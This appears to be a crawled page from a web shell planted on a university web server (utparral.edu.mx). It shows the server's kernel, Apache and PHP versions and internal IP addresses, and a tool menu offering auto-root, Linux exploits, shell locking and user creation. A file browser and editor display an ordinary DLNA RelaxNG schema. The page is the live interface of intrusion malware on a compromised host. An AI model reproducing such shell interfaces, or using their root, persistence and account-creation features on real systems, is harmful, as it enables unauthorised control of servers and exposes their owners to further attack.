Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
gupnp-dlna-2.0 /
dlna-profiles /
[ HOME SHELL ]
Name
Size
Permission
Action
aac.xml
3.04
KB
-rw-r--r--
ac3.xml
1.48
KB
-rw-r--r--
amr.xml
1.35
KB
-rw-r--r--
avc.xml
23.33
KB
-rw-r--r--
common.xml
10.82
KB
-rw-r--r--
dlna-profiles.rng
7.78
KB
-rw-r--r--
jpeg.xml
2.13
KB
-rw-r--r--
lpcm.xml
1.61
KB
-rw-r--r--
mp3.xml
1.72
KB
-rw-r--r--
mpeg1.xml
2.35
KB
-rw-r--r--
mpeg4.xml
23.79
KB
-rw-r--r--
mpeg-common.xml
4.82
KB
-rw-r--r--
mpeg-ps.xml
4.91
KB
-rw-r--r--
mpeg-ts.xml
10.48
KB
-rw-r--r--
png.xml
1.99
KB
-rw-r--r--
wma.xml
1.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dlna-profiles.rng
<?xml version="1.0"?> <!-- dlna-profiles `- zero or more dlna-profile `- zero or more restrictions dlna-profile (name and type mime) `- zero or one parent|restriction type="container" `- one or more parent|restriction type!="container" parent (name) restrictions `- zero or more restriction restriction (type=video|audio|container) `- zero-or-more fields `- id if in restrictions field (name and type=string|int|fourcc|fraction|float|boolean `- value of appropriate type --> <grammar xmlns="http://relaxng.org/ns/structure/1.0"> <define name="include"> <element name="include"> <attribute name="ref"> <text /> </attribute> </element> </define> <define name="field"> <element name="field"> <attribute name="name"> <text /> </attribute> <attribute name="type"> <choice> <value>string</value> <value>int</value> <value>fraction</value> <value>float</value> <value>boolean</value> <value>fourcc</value> </choice> </attribute> <optional> <attribute name="used"> <choice> <value>in-strict</value> <value>in-relaxed</value> </choice> </attribute> </optional> <choice> <oneOrMore> <element name="value"> <text /> </element> </oneOrMore> <element name="range"> <attribute name="min"> <text /> </attribute> <attribute name="max"> <text /> </attribute> </element> </choice> </element> </define> <!-- field --> <define name="parent"> <element name="parent"> <attribute name="name"> <text /> </attribute> <optional> <attribute name="used"> <choice> <value>in-strict</value> <value>in-relaxed</value> </choice> </attribute> </optional> </element> </define> <!-- parent --> <define name="restriction"> <element name="restriction"> <attribute name="type"> <choice> <value>container</value> <value>image</value> <value>audio</value> <value>video</value> <value>text</value> </choice> </attribute> <optional> <attribute name="id"> <text /> </attribute> </optional> <optional> <attribute name="used"> <choice> <value>in-strict</value> <value>in-relaxed</value> </choice> </attribute> </optional> <interleave> <zeroOrMore> <ref name="field" /> </zeroOrMore> <zeroOrMore> <ref name="parent" /> </zeroOrMore> </interleave> </element> </define> <!-- restriction --> <define name="restrictions"> <element name="restrictions"> <zeroOrMore> <ref name="restriction" /> </zeroOrMore> </element> </define> <!-- restrictions --> <define name="dlna-profile"> <element name="dlna-profile"> <choice> <group> <attribute name="name"> <text /> </attribute> <attribute name="mime"> <text /> </attribute> <optional> <attribute name="id"> <text /> </attribute> </optional> </group> <attribute name="id"> <text /> </attribute> </choice> <optional> <attribute name="base-profile"> <text /> </attribute> </optional> <optional> <attribute name="extended"> <choice> <value>true</value> <value>false</value> </choice> </attribute> </optional> <interleave> <zeroOrMore> <ref name="parent" /> </zeroOrMore> <zeroOrMore> <ref name="restriction" /> </zeroOrMore> </interleave> </element> </define> <!-- dlna-profile --> <start> <element name="dlna-profiles"> <interleave> <zeroOrMore> <ref name="include" /> </zeroOrMore> <zeroOrMore> <ref name="restrictions" /> </zeroOrMore> <zeroOrMore> <ref name="dlna-profile" /> </zeroOrMore> </interleave> </element> </start> </grammar>
Close